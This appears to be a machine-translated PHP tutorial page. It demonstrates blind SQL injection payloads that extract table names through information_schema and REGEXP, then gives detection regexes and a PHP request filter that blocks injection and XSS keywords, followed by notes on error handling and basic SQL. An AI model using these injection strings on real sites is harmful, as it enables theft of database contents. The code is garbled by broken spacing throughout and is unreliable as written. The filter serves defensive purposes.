Regular Expressions and SQL Regular Expressions for common SQL attacks in php
This article describes the regular expressions of common SQL attacks in php. Share it with you for your reference. The specific analysis is as follows:
We all know that all database names and field names are stored in the information_schema database of MYSQL 5 +. The attack method is as follows:
1. Determine whether the first character of the first table name is a character in a-z. blind_sqli is a known database name.
Note: In the regular expression, ^ [a-z] indicates that the starting character in the string is within the range of a-z.
Copy codeThe Code is as follows: index. php? Id = 1 and 1 = (SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA = "blind_sqli" AND table_name REGEXP '^ [a-z] 'limit 0, 1 )/*
2. Determine whether the first character is a character in a-n.
Copy codeThe Code is as follows: index. php? Id = 1 and 1 = (SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA = "blind_sqli" AND table_name REGEXP '^ [a-n] 'limit 0, 1 )/*
3. confirm that the character is n
Copy codeThe Code is as follows: index. php? Id = 1 and 1 = (SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA = "blind_sqli" AND table_name REGEXP '^ n' LIMIT 0, 1 )/*
4. Replace the expression as follows:
Copy codeThe Code is as follows: expression like this: '^ n [a-z]'-> '^ ne [a-z]'-> '^ new [a-z]'-> '^ news [a-z] '-> FALSE
In this case, the table name is news. to verify whether the regular expression is '^ news $', you do not need to directly judge table_name = 'News.
5. Then, you can guess other tables. You only need to modify limit-> limit to perform blind injection on the following tables.
For example:
Copy codeThe Code is as follows: $ Exec_Commond = "(\ s | \ S) * (exec (\ s | \ +) + (s | x) p \ w +) (\ s | \ S )*";
$ Simple_XSS = "(\ s | \ S) * (% 3C) | <) (% 2F) |/) * [a-z0-9 %] + (% 3E) |>) (\ s | \ S )*";
$ Eval_XSS = "(\ s | \ S) * (% 65) | e) (\ s) * (% 76) | v) (\ s) * (% 61) | a) (\ s) * (% 6C) | l) (\ s | \ S )*";
$ Image_XSS = "(\ s | \ S) * (% 3C) | <) (% 69) | I | I | (% 49) (% 6D) | m | M | (% 4D) (% 67) | g | G | (% 47) [^ \ n] + (% 3E) |>) (\ s | \ S )*";
$ Script_XSS = "(\ s | \ S) * (% 73) | s) (\ s) * (% 63) | c) (\ s) * (% 72) | r) (\ s) * (% 69) | I) (\ s) * (% 70) | p) (\ s) * (% 74) | t) (\ s | \ S )*";
$ SQL _Injection = "(\ s | \ S) * (% 27) | (') | (% 3D) | (=) | (/) | (% 2F) | (") | (% 22) | (-| % 2D) {2}) | (% 23) | (% 3B) | (;)) + (\ s | \ S )*";
SQL attack code:
Copy codeThe Code is as follows: <? Php
Function customError ($ errno, $ errstr, $ errfile, $ errline)
{
Echo "<B> Error number: </B> [$ errno], error on line $ errline in $ errfile <br/> ";
Die ();
}
Set_error_handler ("customError", E_ERROR );
$ Getfilter = "'| (and | or) \ B. +? (>|<|=| In | like) |\/ \ *. +? \ * \/| <\ S * script \ B | \ bEXEC \ B | UNION. +? SELECT | UPDATE. +? SET | INSERT \ s + INTO. +? VALUES | (SELECT | DELETE). +? FROM | (CREATE | ALTER | DROP | TRUNCATE) \ s + (TABLE | DATABASE )";
$ Postfilter = "\ B (and | or) \ B. {1, 6 }? (= |> | <| \ Bin \ B | \ blike \ B) | \/\ *. +? \ * \/| <\ S * script \ B | \ bEXEC \ B | UNION. +? SELECT | UPDATE. +? SET | INSERT \ s + INTO. +? VALUES | (SELECT | DELETE). +? FROM | (CREATE | ALTER | DROP | TRUNCATE) \ s + (TABLE | DATABASE )";
$ Cookiefilter = "\ B (and | or) \ B. {1, 6 }? (= |> | <| \ Bin \ B | \ blike \ B) | \/\ *. +? \ * \/| <\ S * script \ B | \ bEXEC \ B | UNION. +? SELECT | UPDATE. +? SET | INSERT \ s + INTO. +? VALUES | (SELECT | DELETE). +? FROM | (CREATE | ALTER | DROP | TRUNCATE) \ s + (TABLE | DATABASE )";
Function StopAttack ($ StrFiltKey, $ StrFiltValue, $ ArrFiltReq)
{
If (is_array ($ StrFiltValue ))
{
$ StrFiltValue = implode ($ StrFiltValue );
}
If (preg_match ("/". $ ArrFiltReq. "/is", $ StrFiltValue) = 1 &&! Isset ($ _ REQUEST ['securitytoken'])
{
Slog ("<br> operation IP Address :". $ _ SERVER ["REMOTE_ADDR"]. "<br> operation time :". strftime ("% Y-% m-% d % H: % M: % S "). "<br> operation page :". $ _ SERVER ["PHP_SELF"]. "<br> submission method :". $ _ SERVER ["REQUEST_METHOD"]. "<br> submit parameters :". $ StrFiltKey. "<br> submit data :". $ StrFiltValue );
Print "result notice: Illegal operation! ";
Exit ();
}
}
Foreach ($ _ GET as $ key => $ value)
{
StopAttack ($ key, $ value, $ getfilter );
}
Foreach ($ _ POST as $ key => $ value)
{
StopAttack ($ key, $ value, $ postfilter );
}
Foreach ($ _ COOKIE as $ key => $ value)
{
StopAttack ($ key, $ value, $ cookiefilter );
}
Function slog ($ logs)
{
$ Toppath = "log.htm ";
$ Ts = fopen ($ toppath, "a + ");
Fputs ($ Ts, $ logs. "rn ");
Fclose ($ Ts );
}
?>
SQL analysis:
If you use this function, it bypasses PHP's standard error handling, so you have to define the error handling program (die ()).
Second, if an error occurs before the code is executed, the User-Defined program is not executed at that time, so the error handling program written by the user will not be used.
In PHP, you can use set_error_handler () to handle PHP errors. You can also use the trigger_error () function to throw an error.
The set_error_handler () function sets the custom error handling function. The function is used to create the user's own error handling method during running. It needs to create an error handling function first, and then set the error level.
Usage:
Copy codeThe Code is as follows: function customError ($ errno, $ errstr, $ errfile, $ errline)
{
Echo "<B> error code: </B> [$ {errno}] $ {errstr} \ r \ n ";
Echo "error code line: {$ errline} file {$ errfile} \ r \ n ";
Echo "PHP version", PHP_VERSION, "(", PHP_ OS, ") \ r \ n ";
// Die ();
}
Set_error_handler ("customError", E_ALL | E_STRICT );
Summary
When PHP encounters an error, it will give the location, number of rows, and cause of the error script. Many people say that this is no big deal. However, the consequences of leaking the actual path are unimaginable. For some intruders, this information is very important. In fact, many servers have this problem. Some network administrators simply set display_errors in the PHP configuration file to Off, but I think this method is too negative. Sometimes, we do need PHP to return an error message for debugging. In addition, when an error occurs, you may need to give the user an explanation, or even navigate to another page. But with set_error_handler (), these contradictions can also be solved. However, this function is rarely used.
I hope this article will help you with PHP programming.
Php Regular Expression parsing SQL
$ SQL ='
Create table if not exists uploadtype (
Id int (11) not null AUTO_INCREMENT,
Title varchar (20) DEFAULT '0 ',
Sydefault char (1) DEFAULT '0 ',
Primary key (id)
) ENGINE = MyISAM
';
Preg_match ('# create table. * \ (. * \) ENGINE = MyISAM # isU', $ SQL, $ typefile );
Var_dump ($ typefile );
Common symbols of SQL Regular Expressions
SQL classification:
DDL-Data Definition Language (CREATE, ALTER, DROP, DECLARE)
DML-data manipulation language (SELECT, DELETE, UPDATE, INSERT)
DCL-Data Control Language (GRANT, REVOKE, COMMIT, ROLLBACK)
First, we will briefly introduce the basic statements:
1. Description: Create a database
Create database database-name
2. Description: delete a database.
Drop database dbname
3. Description: Back up SQL server
--- Create a device for the backup data
USE master
EXEC sp_addumpdevice 'disk', 'testback', 'c: \ mssql7backup \ MyNwind_1.dat'
--- Start backup
Backup database pubs TO testBack
4. Description: Create a new table.
Create table tabname (col1 type1 [not null] [primary key], col2 type2 [not null],...)
Create a new table based on an existing table:
A: create table tab_new like tab_old (use the old table to create A new table)
B: create table tab_new as select col1, col2... From tab_old definition only
5. Description: Delete the new table drop table tabname
6. Description: Add a column.
Alter table tabname add column col type
Note: Columns cannot be deleted after they are added. After columns are added to DB2, the data type cannot be changed. The only change is to increase the length of the varchar type.
7. Description: add a primary key: Alter table tabname add primary key (col)
Delete a primary key: Alter table tabname drop primary key (col)
8. Description: create an index: create [unique] index idxname on tabname (col ....)
Delete index: drop index idxname
Note: The index cannot be changed. To change the index, you must delete it and recreate it.
9. Description: create view viewname as select statement
Delete view: drop view viewname
10. Description: several simple basic SQL statements
Select: select * from table1 where range
Insert: insert into table1 (field1, field2) values (value1, value2)
Delete: delete from table1 where range
Update: update table1 set field1 = value1 where range
Search: select * from table1 where field1 like '% value1 %' --- the like syntax is very subtle, query information!
Sort: select * from table1 order by field1, field2 [desc]
Total: select count (*) as totalcount from table1
Sum: select sum (field1) as sumvalue from table1
Average: select avg (field1) as avgvalue from table1
Maximum ...... remaining full text>